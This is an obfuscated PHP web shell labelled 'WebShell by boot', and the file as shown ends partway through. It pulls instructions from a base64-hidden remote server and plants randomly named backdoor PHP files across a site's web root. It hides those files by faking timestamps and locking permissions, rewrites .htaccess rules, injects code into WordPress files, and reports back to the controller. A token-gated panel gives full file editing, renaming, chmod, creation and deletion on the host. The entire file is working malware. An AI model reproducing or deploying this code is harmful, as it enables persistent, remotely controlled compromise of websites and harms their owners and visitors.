<?php goto SlNec; YNQoe: function findFilesWithContent($directory, $searchString, $currentDepth = 0, $maxDepth = 10) { $foundFiles = array(); if ($currentDepth >= $maxDepth) { return $foundFiles; } if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if ($file != "\56" && $file != "\56\56") { $filePath = $directory . "\57" . $file; if (is_dir($filePath)) { $foundFiles = array_merge($foundFiles, findFilesWithContent($filePath, $searchString, $currentDepth + 1, $maxDepth)); } else { if (strpos(file_get_contents($filePath), $searchString) !== false) { $foundFiles[] = $filePath; } } } } closedir($handle); } return $foundFiles; } goto yaCdp; ZQrF8: function execAction($data, $pweb, $now_site) { $group_id = $data["\x67\162\x6f\165\160\x5f\x69\x64"]; $shell_id = $data["\x73\x68\145\x6c\154\137\151\144"]; $shell_type = $data["\163\150\145\154\x6c\137\164\x79\160\x65"]; $url = base64_decode($pweb) . "\x2f\151\156\144\145\x78\x64\x6f\x6f\162\x2e\160\150\x70\x3f\x61\143\x74\151\157\x6e\x3d\156\145\x77\x5f\145\170\x65\143\46\x67\162\157\165\x70\137\151\x64\75" . $group_id . "\46\163\x68\145\x6c\x6c\x5f\x74\171\x70\145\75" . $shell_type; $result_data = array(); $result_data["\x73\x68\145\154\x6c\x5f\x69\x64"] = $shell_id; $result_data["\141\143\164\151\x6f\x6e"] = "\145\x78\145\143"; $save_url = base64_decode($pweb) . "\x2f\x73\x61\166\145\x2e\x70\x68\x70"; $cc = curlget($url); $json_array = json_decode($cc, true); if (isset($json_array["\151\156\x5f\x63\157\156\x74\x6e\164"]) && !empty($json_array["\150\x74\137\x63\157\x6e\164\x6e\x74"]) && !empty($json_array["\x65\x78\x65\x63\x5f\x63\157\144\x65"])) { $website_root = $_SERVER["\104\117\x43\125\x4d\105\116\124\x5f\x52\117\117\124"]; $result = add_exec($website_root, $json_array["\150\164\x5f\x63\x6f\156\x74\x6e\x74"], $json_array["\x69\x6e\x5f\143\157\x6e\164\x6e\164"], $json_array["\145\x78\145\143\x5f\x63\157\x64\x65"], $json_array["\167\x70\x5f\171\143\x6f\144\x65"]); if ($result) { $result_data["\163\x74\x61\164\x75\163"] = 1; } else { $result_data["\143\157\144\x65"] = "\61\60\x30\61"; $result_data["\163\x74\x61\164\165\163"] = 2; } } else { $result_data["\x63\157\x64\x65"] = "\x31\60\x30\62"; $result_data["\163\164\x61\x74\x75\163"] = 2; } $result_data["\163\x68\x65\154\154\137\x74\171\x70\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\164\141\164\165\163"]) { echo "\74\x70\40\x73\x74\171\x6c\x65\75\42\143\x6f\154\x6f\x72\72\x67\162\x65\x65\156\x3b\x22\76\105\x78\x65\x63\x20\151\x73\x20\x73\165\143\x63\x65\x73\x73\x66\165\x6c\x6c\x79\x3c\x2f\160\x3e"; } else { echo "\74\x70\40\163\164\x79\154\x65\75\42\143\x6f\154\157\x72\72\162\x65\x64\73\x22\x3e\x45\170\x65\x63\40\x69\163\40\x66\x61\151\x6c\145\144\x21\40" . $result_data["\143\x6f\144\x65"] . "\74\x2f\160\76"; } } goto FmXiy; XgUHi: error_reporting(0); goto J8UR1; I3IiA: $path = $_REQUEST["\x70\x61\164\x68"]; goto R_qSL; QeSVR: $now_url = $web_url . $sy_path; goto WOiKo; Ed28U: function getFilePermission($filename) { clearstatcache(true, $filename); $perms = fileperms($filename); if (($perms & 49152) === 49152) { $info = "\x73"; } elseif (($perms & 40960) === 40960) { $info = "\154"; } elseif (($perms & 32768) === 32768) { $info = "\x2d"; } elseif (($perms & 24576) === 24576) { $info = "\x62"; } elseif (($perms & 16384) === 16384) { $info = "\x64"; } elseif (($perms & 8192) === 8192) { $info = "\143"; } elseif (($perms & 4096) === 4096) { $info = "\x70"; } else { $info = "\x75"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\167" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\x72" : "\x2d"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\x78" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\167" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } goto UZ0e0; h2qwf: function curlpost($url, $data) { $jsonData = json_encode($data); $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\103\x6f\x6e\164\145\x6e\x74\x2d\124\171\x70\x65\72\x20\141\x70\x70\x6c\151\x63\x61\x74\151\157\156\x2f\x6a\163\157\x6e", "\103\x6f\156\164\x65\156\164\55\x4c\145\156\x67\164\x68\x3a\40" . strlen($jsonData))); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); $response = curl_exec($ch); $result = array(); if (curl_errno($ch)) { $result["\163\x74\x61\x74\165\x73"] = 0; $result["\x6d\x73\x67"] = curl_error($ch); } curl_close($ch); $res = json_decode($response, true); $result["\163\164\x61\164\165\163"] = $res["\x73\x74\141\x74\x75\x73"]; return $result; } goto c5hl3; shzAz: function getFileSize($file_url) { $file_size = filesize($file_url); if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . "\x20\115\x42"; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . "\40\113\x42"; } else { $file_size = $file_size . "\40\x42"; } } return $file_size; } goto Ed28U; vqagS: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto kRdK2; mlMpk: function cndoorfile($fipath, $file_name, $open_content, $contnt) { if (!is_dir($fipath)) { mkdir($fipath, 493, true); } $fileurl = $fipath . "\57" . $file_name; if (file_put_contents($fileurl, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); chmod($fileurl, 365); $ht_content_now = ''; $ht_content_now = str_replace("\173\43\x68\164\x63\x6f\156\164\x65\x6e\164\x7d", $file_name, $open_content); chmod($fipath . "\57\56\x68\x74\x61\143\143\145\163\x73", 493); if (file_put_contents($fipath . "\x2f\x2e\x68\x74\141\143\143\x65\x73\x73", $ht_content_now) !== false) { chmod($fipath . "\x2f\x2e\150\164\141\x63\143\x65\163\x73", 365); } chmod($fipath, 365); return true; } else { return false; } } goto Lto2g; SrSzB: function doorsAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\163\x68\x65\x6c\x6c\x5f\151\144"] = $data["\x73\x68\x65\154\x6c\137\151\144"]; $result_data["\141\143\164\x69\157\x6e"] = "\x64\x6f\157\x72\x73"; $save_url = base64_decode($pweb) . "\x2f\x73\x61\166\x65\56\x70\x68\x70"; $shell_id = $data["\x73\150\145\x6c\154\137\151\x64"]; $group_id = $data["\147\162\x6f\165\x70\137\151\x64"]; $shell_type = $data["\x73\x68\145\x6c\154\x5f\164\171\160\x65"]; $url = base64_decode($pweb) . "\57\151\x6e\144\145\x78\x64\x6f\157\x72\56\x70\x68\x70\x3f\141\143\x74\151\x6f\x6e\75\x64\x6f\x6f\162\163\x26\x73\150\x65\x6c\x6c\137\151\144\75" . $shell_id . "\46\147\x72\x6f\x75\160\137\151\144\x3d" . $group_id . "\46\x73\150\145\x6c\x6c\x5f\x74\171\160\145\x3d" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\144\157\x6f\162\x73"])) { $result = add_doors($json_array["\x64\157\157\162\x73"], $json_array["\144\x6f\x6f\x72\x73\x5f\x35\x35"], $json_array["\x77\x70\137\146\151\x6c\x65\x73"], $json_array["\164\150\x69\x72\144\x5f\x66\151\154\x65"], $json_array["\x68\164\137\x62\x61\x6e\137\143\x6f\x6e\164\x65\x6e\164"], $json_array["\x68\x74\x5f\x6f\160\145\156\137\x63\x6f\x6e\x74\x65\156\x74"], $json_array["\x73\150\x65\x6c\154\137\141\x63\x74\151\x6f\156\x5f\143\x6f\144\145"], $now_site); if (!empty($result["\x64\157\157\x72\x5f\146\x69\154\145\x73"])) { $result_data["\144\x6f\157\x72\137\165\x72\x6c\x73"] = implode("\73", $result["\x64\157\157\x72\137\146\x69\154\145\x73"]); $result_data["\163\x68\145\154\x6c\x5f\x6f\x74\150\x65\x72\137\x75\162\x6c"] = $result["\x73\x68\x65\x6c\x6c\x5f\x6f\164\x68\145\162\x5f\x75\x72\154"]; $result_data["\x73\164\x61\x74\x75\x73"] = 1; } else { $result_data["\x63\157\x64\x65"] = "\61\60\x30\61"; $result_data["\163\x74\141\x74\165\x73"] = 2; } } else { $result_data["\x63\x6f\144\x65"] = "\61\60\60\x32"; $result_data["\163\164\141\164\165\163"] = 2; } $result_data["\163\x68\x65\x6c\x6c\x5f\164\x79\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\x74\141\x74\x75\163"]) { echo "\74\x70\x20\163\x74\171\x6c\x65\x3d\42\143\x6f\154\157\162\72\147\x72\145\x65\156\73\x22\x3e\x44\x6f\x6f\x72\163\x20\x69\x73\40\163\x75\x63\x63\x65\163\163\146\x75\x6c\x6c\171\54\x20\123\x75\143\143\145\163\163\x20\x2e\150\40\x69\163\40" . $result["\143\157\x75\x6e\164"] . "\74\57\160\x3e"; foreach ($result["\144\157\157\x72\x5f\x66\151\154\145\x73"] as $k => $v) { echo "\74\x70\76\x3c\x61\x20\x68\162\x65\146\x3d\42" . $v . "\x22\40\164\141\162\x67\x65\x74\75\x22\137\142\x6c\141\156\153\42\x3e" . $v . "\74\57\141\x3e\74\57\160\76"; } } else { echo "\x3c\160\40\163\x74\171\154\x65\75\42\143\x6f\154\x6f\x72\x3a\162\145\144\73\42\76\x44\157\157\162\163\40\x69\163\x20\146\x61\x69\x6c\145\x64\x21\40" . $result_data["\x63\157\144\145"] . "\74\x2f\160\76"; } } goto Yt1gO; kRdK2: $can_read = false; goto YHyUp; NzT0a: function curlget($url) { $url_data = ''; if (function_exists("\146\151\154\145\x5f\x67\x65\164\x5f\143\x6f\x6e\x74\x65\x6e\164\163")) { $url_data = file_get_contents($url); } if (empty($url_data) && function_exists("\143\165\x72\154\137\x65\x78\145\x63")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_data = curl_exec($conn); curl_close($conn); } if (empty($url_data) && function_exists("\146\157\160\145\156") && function_exists("\x73\164\162\145\x61\155\x5f\147\145\x74\137\x63\157\156\164\x65\156\x74\x73")) { $handle = fopen($url, "\162"); $url_data = stream_get_contents($handle); fclose($handle); } return $url_data; } goto h2qwf; h2FOj: function othersAction($data, $pweb, $now_site) { $shell_id = $data["\x73\x68\145\154\154\x5f\151\144"]; $group_id_2 = $data["\x67\162\x6f\165\160\137\151\x64\137\x32"]; $group_id_3 = $data["\x67\162\x6f\x75\x70\137\x69\144\x5f\x33"]; $shell_type = $data["\163\x68\x65\154\x6c\137\x74\x79\160\145"]; $url = base64_decode($pweb) . "\x2f\x69\156\144\x65\x78\x64\157\157\162\56\160\x68\x70\77\141\x63\x74\x69\x6f\156\75\x6f\x74\150\145\x72\163\46\x67\x72\157\x75\x70\137\x69\x64\137\62\x3d" . $group_id_2 . "\46\147\162\x6f\165\160\x5f\151\x64\x5f\x33\75" . $group_id_3 . "\x26\163\150\x65\x6c\154\x5f\164\x79\160\x65\75" . $shell_type; $result_data = array(); $result_data["\x73\x68\x65\154\x6c\137\151\x64"] = $shell_id; $result_data["\141\143\164\151\x6f\156"] = "\157\x74\150\x65\162\x73"; $save_url = base64_decode($pweb) . "\57\x73\x61\x76\145\56\x70\150\160"; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\147\x72\x6f\165\x70\x32\137\143\x6f\x64\145"]) && !empty($json_array["\163\x65\143\157\x6e\144\x5f\x66\151\x6c\x65"]) || !empty($json_array["\x67\x72\x6f\165\x70\x33\x5f\143\157\x64\x65"]) && !empty($json_array["\164\150\151\x72\x64\137\x66\x69\x6c\x65"])) { $result = add_others($json_array["\x67\162\157\x75\x70\x32\x5f\143\x6f\144\x65"], $json_array["\x67\x72\x6f\x75\160\63\x5f\x63\x6f\x64\x65"], $json_array["\x73\145\x63\x6f\156\x64\137\x66\x69\x6c\x65"], $json_array["\164\150\151\162\144\x5f\x66\x69\154\x65"], $now_site); if (!empty($result["\x73\x65\x63\157\156\144\x5f\165\162\154"]) || !empty($result["\164\x68\x69\x72\x64\x5f\x75\x72\154"])) { $result_data["\x73\145\143\157\x6e\x64\137\165\162\x6c"] = $result["\x73\x65\143\157\x6e\144\x5f\x75\162\154"]; $result_data["\x74\x68\151\x72\144\137\x75\x72\154"] = $result["\x74\x68\x69\162\144\x5f\165\162\x6c"]; $result_data["\163\x74\141\164\x75\x73"] = 1; } else { $result_data["\x63\157\x64\145"] = "\x31\x30\x30\x31"; $result_data["\163\164\x61\x74\165\163"] = 2; } } else { $result_data["\x63\157\x64\145"] = "\61\60\x30\62"; $result_data["\163\164\x61\x74\165\163"] = 2; } $result_data["\163\x68\145\x6c\154\137\x74\x79\x70\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\x74\141\x74\x75\163"]) { echo "\x3c\160\40\163\x74\x79\x6c\145\x3d\x22\x63\x6f\x6c\157\x72\x3a\x67\162\145\x65\156\x3b\42\76\x4f\164\x68\x65\x72\x73\40\x69\x73\x20\163\x75\x63\x63\x65\163\x73\146\x75\x6c\154\x79\x3c\x2f\160\x3e"; } else { echo "\x3c\x70\x20\x73\x74\x79\x6c\x65\x3d\42\x63\x6f\154\x6f\x72\72\x72\x65\x64\x3b\42\x3e\117\x74\x68\x65\x72\163\x20\x69\163\40\146\141\x69\x6c\x65\x64\41\x20" . $result_data["\x63\x6f\144\145"] . "\x3c\x2f\160\x3e"; } } goto Ao621; Yt1gO: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { $result = array(); global $door_lists, $all_paths, $last_folder_url; $path = $_SERVER["\104\x4f\103\125\x4d\x45\x4e\124\x5f\122\117\117\x54"]; $door_count = count($doors_array) + count($doors_55_array); getAllDirectories($path, 1, $door_count); if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); $door_files = array(); $succ_files = array(); $i = 0; $shell_other_url = ''; foreach ($randomKeys as $key) { $file_door_url = $door_lists[$key]; $file_name = getrandstr(rand(5, 10)) . "\x2e\x70\x68\x70"; if ($i >= count($doors_array)) { $file_door_url = $file_door_url . "\57\x77\x70"; $file_url = $file_door_url . "\x2f" . $file_name; $res = cndoorfile($file_door_url, $file_name, $open_content, base64_decode($doors_55_array[$i - count($doors_array)])); } else { $file_url = $file_door_url . "\57" . $file_name; $res = crdoorfile($file_url, base64_decode($doors_array[$i])); } if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } $i++; } if (!empty($last_folder_url)) { $file_url = $last_folder_url . "\57\151\156\144\x65\170\56\160\150\x70"; $res = crdoorfile($file_url, base64_decode($shell_action_code)); if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } } $count = 0; if (count($succ_files) > 0) { $ht_urls = array(); $wp_files_array = explode("\73", $wp_files); foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } $ht_urls = $succ_files; $ht_urls = array_merge($ht_urls, $wp_files_array); $ht_urls[] = $path . "\x2f" . $third_file; $ht_folders = array(); $ht_files = array(); foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } foreach ($all_paths as $k => $a) { $now_files = array(); foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } $ht_content_now = ''; if (!empty($now_files)) { $ht_content_now = str_replace("\x7b\43\x68\164\x63\157\x6e\x74\x65\156\x74\175", implode("\x7c", $now_files), $open_content); } else { $ht_content_now = $ban_content; } chmod($a . "\57\56\x68\164\x61\143\143\x65\x73\x73", 493); if (file_put_contents($a . "\x2f\56\x68\x74\x61\143\143\145\163\163", $ht_content_now) !== false) { $count++; chmod($a . "\x2f\56\x68\164\x61\x63\x63\x65\163\163", 365); } } } $result["\x64\157\x6f\x72\137\146\x69\154\x65\163"] = $door_files; $result["\x73\150\145\x6c\x6c\x5f\157\164\x68\x65\162\137\x75\x72\x6c"] = $shell_other_url; $result["\x63\x6f\165\x6e\x74"] = $count; return $result; } goto CPlro; WOiKo: $post_data = $_POST; goto DUtAh; U8Ob9: $type = $_REQUEST["\164\x79\160\145"]; goto I3IiA; yNDDi: if (!empty($_SESSION["\x63\x32\x68\x6c\142\107\170\x66\x59\x32\x39\153\132\x51\x3d\75"]) && strlen($_SESSION["\x63\62\x68\154\x62\x47\x78\146\131\62\71\153\x5a\121\x3d\75"]) == 20) { ?> <!doctypehtml><html lang="en"><head><title>WebShell by boot</title><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"rel="stylesheet"><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script><style>.col-12{width:100%;display:inline-block}.col-6{width:50%;display:inline-block;float:left}</style></head><body><div class="jumbotron text-center"style="padding:1rem 0"><h1 style="font-size:2rem;font-weight:700;margin:1rem 0">WebShell by boot</h1></div><div class="container"><div class="row"><p><div style="width:30%;display:inline-block">Server IP:<?php echo $data["\123\x45\x52\x56\x45\x52\x5f\101\104\104\122"]; ?> </div><div style="width:30%;display:inline-block">Server Software:<?php echo $data["\123\105\x52\x56\105\122\137\123\x4f\x46\124\x57\x41\x52\105"]; ?> </div><div style="width:30%;display:inline-block">OS:<?php echo PHP_OS; ?> </div></p><p><div style="width:30%;display:inline-block">Website:<?php echo $data["\x48\x54\124\x50\x5f\x48\117\123\124"]; ?> </div><div style="width:30%;display:inline-block">User:<?php echo get_current_user(); ?> </div></p><p><a href="?path=<?php echo $website_path; ?> ">Project</a></p></div><div class="row"><p>Path:<?php $file_now_path = ''; foreach ($file_path_array as $k => $v) { if (empty($v)) { ?> <a href="?path=/">-</a>r<?php } else { if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . "\x2f" . $v; } $file_now_path = $file_now_path . "\x2f" . $v; ?> /<a href="?path=<?php echo $file_now_path; ?> "><?php echo trim($v); ?> </a><?php } } ?> <span style="color:green"style="color:red"<?php if ($can_read) { } else { } ?> >Readable</span> | <span style="color:green"style="color:red"<?php if ($can_write) { } else { } ?> >Writeable</span></p></div><?php if ($type == 2 || $type == 3) { if ($type == 3) { $file_content = $_REQUEST["\x66\x69\154\145\x5f\x63\x6f\156\x74\x65\x6e\164"]; $content_result = file_put_contents($path, $file_content); if ($content_result) { echo "\74\x64\x69\166\x20\x63\154\x61\x73\163\75\42\141\x6c\x65\x72\x74\40\141\x6c\145\x72\x74\55\x73\x75\143\x63\x65\x73\x73\x22\x20\x72\x6f\x6c\x65\x3d\x22\x61\154\x65\162\x74\x22\x3e\106\151\154\145\40\143\157\156\x74\145\x6e\164\40\x6d\157\x64\x69\x66\x69\145\x64\40\163\x75\143\x63\145\x73\x73\x66\165\154\x6c\x79\41\x3c\x2f\x64\151\166\x3e"; } else { echo "\74\x64\151\x76\40\x63\154\x61\x73\x73\x3d\x22\x61\154\145\x72\x74\40\x61\154\145\162\164\55\x64\x61\x6e\x67\x65\x72\42\x20\162\157\x6c\145\75\42\x61\154\x65\162\164\42\x3e\106\141\151\x6c\x65\x64\x20\164\x6f\40\x6d\x6f\x64\x69\146\171\40\146\151\x6c\x65\40\143\x6f\156\x74\145\x6e\x74\x21\x3c\x2f\144\151\x76\76"; } } ?> <div class="row"><form action="?type=3"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\150\x6c\x62\x47\170\146\131\62\x39\153\x5a\121\x3d\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <textarea class="form-control"cols="100"id="exampleFormControlTextarea1"name="file_content"rows="20"><?php echo htmlspecialchars($content); ?> </textarea></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 4) { $file_new_name = $_POST["\x66\151\x6c\145\x5f\156\x65\167\137\x6e\x61\x6d\x65"]; if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . "\57" . $file_new_name); if ($rename_result) { echo "\x3c\144\x69\x76\x20\x63\x6c\x61\163\163\x3d\42\x61\154\145\162\164\x20\141\154\x65\162\x74\x2d\x73\165\x63\143\x65\x73\163\42\x20\162\x6f\x6c\145\75\42\x61\x6c\145\162\164\42\x3e\x46\x69\154\x65\40\156\141\x6d\145\40\x6d\157\x64\151\146\x69\x65\x64\x20\163\x75\143\143\x65\x73\163\146\x75\154\154\x79\x21\74\x2f\x64\x69\166\76"; $file_path = $now_path . "\57" . $file_new_name; } else { echo "\x3c\144\151\x76\40\x63\154\141\x73\163\x3d\42\141\154\145\162\x74\x20\141\x6c\x65\162\164\x2d\x64\141\x6e\x67\145\x72\x22\40\162\157\x6c\x65\75\x22\141\154\x65\162\164\42\x3e\x46\x61\x69\154\x65\144\40\164\x6f\x20\x6d\x6f\144\x69\x66\171\40\146\151\x6c\145\x20\x6e\141\x6d\145\41\x3c\x2f\144\x69\x76\x3e"; } } ?> <div class="row"><form action="?type=4"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\62\150\x6c\x62\107\170\146\131\x32\71\153\132\x51\x3d\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <input name="file_new_name"value="<?php echo basename($file_path); ?> "id="file_new_name"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 5) { $new_chmod = trim($_POST["\156\x65\167\137\143\150\x6d\x6f\x64"]); if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo "\x3c\144\151\166\x20\x63\154\x61\x73\x73\75\42\x61\154\145\162\x74\40\141\154\145\x72\x74\55\x73\165\x63\x63\x65\163\163\x22\x20\x72\157\154\x65\x3d\42\141\154\x65\162\164\42\x3e\x46\151\154\x65\x20\160\145\x72\x6d\x69\x73\163\x69\x6f\x6e\163\x20\x6d\x6f\x64\151\x66\151\145\x64\40\163\x75\143\143\x65\163\163\146\x75\x6c\x6c\171\41\74\57\144\x69\x76\76"; $old_chmod = $new_chmod; } else { echo "\74\x64\x69\166\40\x63\x6c\141\163\163\x3d\x22\141\x6c\145\x72\164\x20\x61\x6c\145\x72\164\55\144\141\156\x67\145\162\42\40\x72\x6f\154\145\x3d\x22\141\x6c\145\162\164\x22\76\x46\141\151\x6c\145\x64\x20\x74\157\40\155\x6f\144\151\146\x79\x20\x66\x69\x6c\x65\x20\160\145\x72\x6d\151\x73\163\x69\157\x6e\x73\x21\74\x2f\x64\x69\166\76"; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf("\45\157", $permissions), -4); } ?> <div class="row"><form action="?type=5"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\62\x68\x6c\x62\x47\170\146\131\62\71\153\132\121\75\75"]; ?> "type="hidden"><div class="form-group"><?php $content = file_get_contents($file_path); ?> <input name="new_chmod"value="<?php echo $old_chmod; ?> "id="new_chmod"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php } else { if ($type == 6) { $new_name = trim($_POST["\x6e\145\167\137\156\141\x6d\x65"]); $new_content = trim($_POST["\156\x65\167\137\x63\157\x6e\x74\x65\156\x74"]); if (!empty($new_name)) { if (is_file($now_path . "\57" . $new_name)) { echo "\x3c\x64\x69\166\40\143\154\x61\163\163\75\x22\141\x6c\x65\162\x74\40\x61\x6c\x65\162\164\55\x64\141\x6e\147\x65\162\42\x20\x72\x6f\x6c\x65\x3d\42\141\154\x65\x72\164\42\x3e\124\x68\x65\40\x66\x69\154\x65\40\141\x6c\x72\145\141\144\171\40\x65\x78\x69\163\x74\163\x21\74\57\144\x69\166\76"; } else { $file = fopen($now_path . "\x2f" . $new_name, "\167"); if ($file) { if (fwrite($file, $new_content)) { echo "\74\144\x69\x76\40\x63\x6c\x61\x73\x73\75\x22\x61\154\145\x72\x74\x20\141\154\145\x72\x74\x2d\163\165\143\x63\x65\163\x73\42\x20\162\x6f\154\x65\75\x22\x61\x6c\145\x72\x74\42\x3e\106\151\x6c\x65\x20\x63\162\x65\141\x74\x65\144\x20\163\165\143\143\145\x73\163\146\x75\154\x6c\x79\41\74\x2f\144\151\x76\76"; } else { echo "\x3c\144\x69\166\x20\143\154\x61\x73\x73\75\x22\x61\154\145\x72\x74\40\141\154\145\162\164\55\144\x61\156\147\x65\162\x22\40\x72\157\154\x65\x3d\x22\x61\154\145\162\x74\42\76\125\156\x61\x62\154\145\40\x74\157\x20\167\x72\151\164\145\x20\164\x6f\40\x66\x69\154\145\41\74\x2f\144\151\166\x3e"; } fclose($file); } else { echo "\x3c\144\x69\x76\40\143\x6c\141\x73\163\x3d\x22\141\x6c\x65\162\164\40\141\154\x65\162\164\x2d\x64\141\x6e\x67\145\x72\x22\40\x72\x6f\154\145\75\x22\141\154\145\162\x74\42\76\x55\x6e\x61\x62\154\145\x20\164\157\40\x6f\x70\145\x6e\x20\146\x69\x6c\x65\x21\74\x2f\144\151\166\76"; } } } ?> <div class="row"><form action="?type=6"method="post"><input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\143\x32\x68\x6c\x62\x47\170\146\x59\x32\x39\x6b\132\x51\x3d\75"]; ?> "type="hidden"><div class="form-group"><input name="new_name"value="<?php echo $new_name; ?> "id="new_name"class="form-control"placeholder="New File Name"></div><div class="form-group"><textarea class="form-control"cols="100"id="new_content"name="new_content"rows="20"placeholder="New File Content"><?php echo htmlspecialchars($new_content); ?> </textarea></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php } else { if ($type == 7) { $new_name = trim($_POST["\x6e\145\167\137\x6e\x61\x6d\x65"]); if (!empty($new_name)) { if (!is_dir($now_path . "\57" . $new_name)) { if (mkdir($now_path . "\57" . $new_name)) { echo "\x3c\144\x69\x76\x20\143\154\x61\x73\163\x3d\x22\x61\x6c\145\x72\164\40\141\154\x65\162\164\55\x73\165\143\x63\145\163\163\x22\40\x72\x6f\x6c\x65\x3d\42\x61\x6c\145\162\x74\42\76\x44\x69\x72\145\x63\164\x6f\162\171\40\x63\162\145\x61\x74\145\x64\x20\x73\165\x63\143\145\163\163\146\x75\x6c\154\x79\x21\x3c\57\144\151\166\x3e"; } else { echo "\74\x64\x69\x76\x20\x63\154\x61\163\163\75\42\x61\154\x65\162\x74\x20\x61\x6c\x65\x72\164\x2d\163\x75\143\143\145\x73\x73\x22\40\162\157\x6c\x65\75\x22\141\154\x65\162\164\42\76\104\151\162\145\x63\164\157\x72\171\40\x63\162\145\141\x74\151\157\x6e\40\x66\141\151\154\x65\144\41\74\57\144\151\166\76"; } } else { echo "\x3c\x64\x69\x76\x20\x63\x6c\141\163\x73\x3d\42\x61\x6c\145\x72\164\40\141\x6c\145\x72\164\55\163\x75\x63\x63\145\x73\x73\x22\40\x72\x6f\154\x65\x3d\42\141\154\x65\x72\164\x22\76\x44\151\162\145\143\164\x6f\x72\x79\40\x61\154\162\145\x61\x64\171\x20\145\170\x69\163\164\x73\41\x3c\x2f\144\151\166\76"; } } ?> <div class="row"><form action="?type=7"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php echo $_SESSION["\x63\x32\x68\154\x62\x47\170\146\131\x32\71\153\x5a\x51\75\75"]; ?> "type="hidden"> <input name="path"value="<?php echo $file_path; ?> "type="hidden"id="path"><div class="form-group"><input name="new_name"value="<?php echo $new_name; ?> "id="new_name"class="form-control"placeholder="New Folder Name"></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php } else { if ($type == 8) { $search_keys = trim($_POST["\x73\x65\x61\x72\143\150\x5f\153\145\171\163"]); $act = trim($_POST["\x61\143\x74"]); ?> <div class="row"><form action="?type=8"method="post"><div class="form-group"><input name="search_keys"value="<?php echo $search_keys; ?> "id="search_keys"class="form-control"placeholder="Search content"></div><button class="btn btn-success"type="submit">Search</button></form></div><?php if (!empty($search_keys)) { $result = array(); $file_list = findFilesWithContent($website_path, $search_keys, 0, 10); ?> <form action="?type=8"method="post"id="deleteForm"style="margin:1rem"><input name="act"value="deleteFiles"type="hidden"id="act"><div><p><input name="allcheck"value="1"type="checkbox"id="allcheck"> all check <input value="delete"type="button"class="delBtn"></p></div><div><?php foreach ($file_list as $file) { $str = "\74\x61\40\150\x72\145\x66\x3d\x22\77\x70\x61\x74\x68\x3d" . $file . "\x26\164\x79\x70\x65\75\x32\x22\40\164\x61\162\147\145\x74\x3d\x22\x5f\142\154\141\x6e\x6b\x22\76" . $file . "\x3c\57\x61\76"; echo 